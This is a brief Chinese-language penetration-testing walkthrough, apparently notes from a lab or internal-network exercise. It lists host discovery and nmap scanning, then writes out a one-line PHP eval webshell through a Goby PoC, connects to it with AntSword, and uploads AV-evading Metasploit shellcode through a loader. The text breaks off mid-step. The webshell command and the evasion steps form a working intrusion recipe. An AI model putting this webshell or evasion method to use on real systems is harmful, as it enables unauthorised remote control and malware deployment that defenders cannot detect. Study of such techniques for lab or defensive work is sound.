1.信息收集
主机发现
sudo netdiscover eth0 -r 192.168.31.0/24
端口扫描
nmap -A 192.168.31.57 -p- -sV -oN nmap.a
goby漏扫
2.漏洞利用
goby 通用poc写webshell
echo ^<?php @eval($_POST['123']) ?^> > #注意”>“字符需要转义
type shell.php
蚁剑连接webshell
3.内网渗透
webshell权限为sun\Administrator权限
MSFshellcode免杀马上传
使用掩日3.2进行加载shelcode,